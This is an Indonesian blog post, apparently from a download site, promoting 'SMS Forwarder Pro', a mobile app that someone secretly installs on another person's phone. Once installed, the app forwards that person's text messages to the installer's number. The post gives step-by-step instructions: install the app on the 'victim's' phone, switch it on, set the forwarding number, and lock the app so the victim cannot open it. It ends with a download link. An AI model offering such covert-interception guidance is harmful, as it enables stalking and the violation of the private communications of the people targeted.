News Update :

SMS FORWARDER PRO : Aplikasi Penyadap SMS

Ada satu lagi nih aplikasi "sms"an yang dapat sobat download untuk melengkapi koleksi aplikasi sms anda untuk kemudian diinstal pada ponsel mereka yang ingin anda sadap isi pesannya.

Nama aplikasi ini "SMS Forwarder Pro".....
Aplikasi unik yang berfungsi untuk menyadap/mengetahui isi sms orang lain ini beroperasi dengan cara seperti yang telah kami sebutkan diatas tadi, yaitu harus terinstal pada ponsel "korban" yang akan anda sadap isi pesannya.

 

Setelah terinstal, kemudian buka aplikasi SMS Forwarder Pro, lalu aktifkan dengan mengklik kolom activated, status : On, kemudian lakukan pengaturan "fordward to" ke nomor yang akan menerima SMS hasil sadapan, yaitu nomor ponsel sobat sendiri (atau bisa juga ke nomor lain, tapi tidak dianjurkan kecuali memang diperlukan). Setelah pengaturan selesai, kemudian protect login aplikasi supaya aplikasi SMS Forwarder Pro ini tidak bisa dibuka oleh korban yang telah anda sadap tadi.

Ingin segera mengoperasikan aplikasi SMS
Forwarder Pro ini ??? Silahkan didownload dengan mengarahkan kursor pada LINK INI,,,

Artikel Terkait Mobile ,Mobile Symbian

Share this Article on :
 

© Copyright UANG DOWNLOAD 2011-2013 | Design by Investasi Dari Sofa Rumah | Template by Herdiansyah Hamzah | Published by Borneo Templates | Powered by Blogger.com.